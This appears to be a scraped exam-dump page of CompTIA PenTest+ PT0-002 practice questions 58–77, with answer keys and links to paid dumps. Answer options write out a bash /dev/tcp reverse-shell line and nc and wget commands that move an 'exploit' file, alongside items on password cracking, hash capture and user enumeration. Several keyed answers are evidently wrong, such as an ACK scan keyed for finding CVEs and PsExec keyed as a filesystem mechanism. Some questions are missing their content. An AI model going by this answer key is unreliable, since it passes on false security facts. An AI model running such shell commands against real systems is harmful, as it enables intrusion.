• Home
  • Articles
  • Jan-2022 Realistic PT0-002 Exam Dumps with Accurate & Updated Questions [Q58-Q77]

Jan-2022 Realistic PT0-002 Exam Dumps with Accurate & Updated Questions [Q58-Q77]

Share

Jan-2022 Realistic PT0-002 Exam Dumps with Accurate & Updated Questions

PT0-002 Exam Dumps - PDF Questions and Testing Engine

NEW QUESTION 58
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. powershell -exec bypass -f \\10.10.51.50\9891
  • B. nc 10.10.51.50 9891 < exploit
  • C. wget 10.10.51.50:9891/exploit
  • D. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

Answer: C

 

NEW QUESTION 59
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Answer:

Explanation:

 

NEW QUESTION 60
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

  • A. Externally facing open ports
  • B. IP addresses and subdomains
  • C. Shodan results
  • D. DNS forward and reverse lookups
  • E. Zone transfers
  • F. Internet search engines

Answer: B,E

 

NEW QUESTION 61
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Hydra and crunch
  • B. Burp Suite and DIRB
  • C. Netcat and cURL
  • D. Nmap and OWASP ZAP

Answer: A

 

NEW QUESTION 62
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the -sV and -p22 options set against the target
  • B. Run nmap with the --script vulners option set against the target
  • C. Run nmap with the -sA option set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Answer: C

 

NEW QUESTION 63
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. Alternate data streams
  • C. PowerShell modules
  • D. MP4 steganography

Answer: A

 

NEW QUESTION 64
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. Supervisors and controllers are on a separate virtual network by default.
  • B. PLCs will not act upon commands injected over the network.
  • C. Supervisory systems will detect a malicious injection of code/commands.
  • D. Controllers will not validate the origin of commands.

Answer: D

 

NEW QUESTION 65
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. Hydra
  • B. Cain and Abel
  • C. Mimikatz
  • D. John the Ripper

Answer: D

 

NEW QUESTION 66
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?

  • A. "cisco-ios" "admin+1234"
  • B. "cisco-ios" "default-passwords"
  • C. "cisco-ios" "last-modified"
  • D. "cisco-ios" "no-password"

Answer: A

 

NEW QUESTION 67
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. A firewall or IPS blocked the scan.
  • B. The edge network device was disconnected.
  • C. The scan returned ICMP echo replies.
  • D. The penetration tester used unsupported flags.

Answer: A

 

NEW QUESTION 68
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

  • A. Test with proof-of-concept code from an exploit database
  • B. Manually check the version number of the VoIP service against the CVE release
  • C. Utilize an nmap -sV scan against the service
  • D. Review SIP traffic from an on-path position to look for indicators of compromise

Answer: C

 

NEW QUESTION 69
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?

  • A. Encrypted file transfers
  • B. IP addresses
  • C. Multiple handshakes
  • D. User hashes sent over SMB

Answer: D

 

NEW QUESTION 70
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Use an FTP exploit against the server.
  • C. Capture traffic using Wireshark.
  • D. Perform a brute-force attack over the server.

Answer: C

 

NEW QUESTION 71
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)

  • A. Crawling the client's website
  • B. Using the WHOIS lookup tool
  • C. Utilizing DNS lookup tools
  • D. Conducting wardriving near the client facility
  • E. Phishing company employees
  • F. Scraping social media sites

Answer: A,B

 

NEW QUESTION 72
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

  • A. RCPT TO and VRFY
  • B. EXPN and TURN
  • C. VRFY and EXPN
  • D. VRFY and TURN

Answer: C

 

NEW QUESTION 73
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To discuss the findings and dispute any false positives
  • B. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • C. To provide feedback on the report structure and recommend improvements
  • D. To determine any processes that failed to meet expectations during the assessment

Answer: D

 

NEW QUESTION 74
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

  • A. info
  • B. about
  • C. index.html
  • D. home.html

Answer: B

 

NEW QUESTION 75
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  • A. Single quote
  • B. Semicolon
  • C. Comma
  • D. Double dash

Answer: A

 

NEW QUESTION 76
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

  • A. PTES technical guidelines
  • B. OWASP Web Security Testing Guide
  • C. NIST SP 800-115
  • D. OSSTMM

Answer: A

 

NEW QUESTION 77
......

Pass CompTIA PT0-002 Exam Quickly With TestKingFree: https://www.testkingfree.com/CompTIA/PT0-002-practice-exam-dumps.html

PT0-002 Dumps - The Sure Way To Pass Exam: https://drive.google.com/open?id=1WetJ-IFY69Xm9iMiPw2IVocYUHIPHhVl

Related Articles

more
CompTIA PT0-002 Certification Practice Exam